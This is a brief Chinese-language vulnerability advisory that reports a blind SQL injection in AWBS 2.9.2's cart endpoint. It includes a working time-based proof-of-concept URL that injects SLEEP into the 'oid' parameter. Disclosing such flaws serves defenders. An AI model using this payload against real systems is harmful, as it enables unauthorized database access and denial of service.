AWBS 2.9.2 Blind SQL 注入0day
发布时间:2016-12-21 来源:查字典编辑
摘要:影响版本:AWBS2.9.2官方网站:http://www.awbs.com漏洞类型:SQL注入漏洞描述:---Vulnerability-...
影响版本:AWBS 2.9.2
官方网站:http://www.awbs.com
漏洞类型:SQL注入
漏洞描述:
---Vulnerability---
http(s)://[HOST]/cart?ca=add_other&oid=[TRUE VALUE]'[BLIND-SQL]
=============================================================================================
---PoC Using Time-Based Blind SQL Injection---
https://www.vulnerablehost.com/cart?ca=add_other&oid=1'%20AND%20SLEEP(100)='